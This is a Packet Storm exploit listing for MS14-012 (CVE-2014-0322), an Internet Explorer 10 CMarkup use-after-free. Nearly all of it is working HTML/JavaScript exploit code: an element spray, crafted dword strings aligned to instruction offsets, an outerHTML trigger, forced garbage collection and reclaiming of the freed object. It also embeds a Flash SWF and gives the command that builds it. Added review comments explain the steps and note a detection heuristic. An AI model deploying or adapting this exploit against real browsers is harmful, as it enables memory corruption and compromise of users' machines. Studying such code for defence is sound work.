MS14-012 Internet Explorer CMarkup Use-After-Free

2014-04-14T00:00:00
ID PACKETSTORM:126150
Type packetstorm
Reporter Jean-Jamil Khalife
Modified 2014-04-14T00:00:00

Description

                                        
                                            `<!--  
MS14-012 Internet Explorer CMarkup Use-After-Free  
Vendor Homepage: http://www.microsoft.com  
Version: IE 10  
Date: 2014-03-31  
Exploit Author: Jean-Jamil Khalife  
Tested on: Windows 7 SP1 x64 (fr, en)  
Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)  
Home: http://www.hdwsec.fr  
Blog: http://www.hdwsec.fr/blog/
MS14-012 / CVE-2014-0322  
  
Generation:  
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf  
  
E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as  
  
-->  
  
<html>  
<head>  
</head>  
<body>  
  
<script>  
  
// Elements created by eXpl() and later given the crafted title string.
var g_arr = new Array();
// Number of elements to create (0x250).
var arrLen = 592;
  
/**
 * Encodes a 32-bit value as a two-character UTF-16 string, low 16-bit word
 * first (the little-endian in-memory order of the dword).
 * @param {number} dword  value to encode; expected to fit in 32 bits
 * @returns {string} two UTF-16 code units produced via unescape('%uXXXX%uXXXX')
 */
function dword2data(dword)
{
  var hex = Number(dword).toString(16);
  // Left-pad to eight hex digits; longer inputs are not truncated.
  if (hex.length < 8) {
    hex = '00000000'.slice(hex.length) + hex;
  }
  var lowWord = hex.substr(4, 8);
  var highWord = hex.substr(0, 4);
  return unescape(['%u', lowWord, '%u', highWord].join(''));
}
  
// Handler installed by trigger() on the script element's onpropertychange event.
// Sequence (from the comments in the body): create arrLen div elements, build a
// string of dword2data() units with specific values at the lengths the
// instruction comments refer to, re-run the outerHTML self-assignment marked as
// the trigger, force a GC, then write the string into every div's title.
// NOTE(review): CollectGarbage() is an IE/JScript-only global; outside IE this
// function throws a ReferenceError at that line. The combination of a large
// element spray, CollectGarbage() and an outerHTML self-assignment is a useful
// detection heuristic for pages of this kind.
function eXpl()
{
var a=0;

// Allocate the elements whose title strings are written at the end.
for (a=0; a < arrLen; a++) {
g_arr[a] = document.createElement('div');
}

// Build a new object
// Each dword2data() unit is 2 UTF-16 chars (4 bytes), so b.length == N/2 means
// the next unit lands at byte offset N; the offsets checked below match the
// instruction operands quoted in the comments. Grows until 0x360 chars.
var b = dword2data(0x19fffff3);
while (b.length < 0x360)
{
// mov eax,dword ptr [esi+98h]
// ...
// mov eax,dword ptr [eax+8]
// and dword ptr [eax+2F0h],0FFFFFFBFh
if (b.length == (0x98 / 2))
{
b += dword2data(0x1a000010);
}
// mov ecx,dword ptr [edx+94h]
// mov eax,dword ptr [ecx+0Ch]
else if (b.length == (0x94 / 2))
{
b += dword2data(0x1a111111);
}
// mov eax,dword ptr [edx+15Ch]
// mov ecx,dword ptr [eax+edx*8]
else if (b.length == (0x15c / 2))
{
b += dword2data(0x42424242);
}
else
{
b += dword2data(0x19fffff3);
}
}

// Keep the first (0x340 - 2)/2 = 0x19f chars, i.e. 0x33e bytes of the string.
var d = b.substring(0, ( 0x340 - 2 )/2);

// trigger
// `this` is presumably the script element the handler was attached to in
// trigger() — verify; exceptions from the assignment are deliberately ignored.
try{
this.outerHTML=this.outerHTML
}
catch(e){

}

// IE-only: forces the JScript garbage collector to run now.
CollectGarbage();

// Replace freed object
// substring(0, length) yields the same content as d; presumably used to obtain
// a separate string allocation per element — confirm.
for (a=0; a < arrLen; a++)
{
g_arr[a].title = d.substring(0, d.length);
}
}
  
// Trigger the vulnerability  
// Trigger the vulnerability
// Installs eXpl as the handler for IE's proprietary onpropertychange event on
// the first <script> element (the only script block in this document) and then
// appends a SELECT child to it. Nothing in the visible markup calls trigger();
// presumably the embedded AsXploit.swf invokes it — confirm against the .as
// source referenced in the header comment.
function trigger()
{
var a = document.getElementsByTagName("script"); // live collection; index 0 is this script block
var b = a[0];
b.onpropertychange = eXpl; // IE-only event; eXpl is expected to run with `this` bound to b (assumed)
var c = document.createElement('SELECT');
c = b.appendChild(c); // appendChild returns the inserted node, so the reassignment is a no-op
}
  
  
  
</script>  
<embed src=AsXploit.swf width="10" height="10"></embed>  
</body>  
</html>  
  
  
`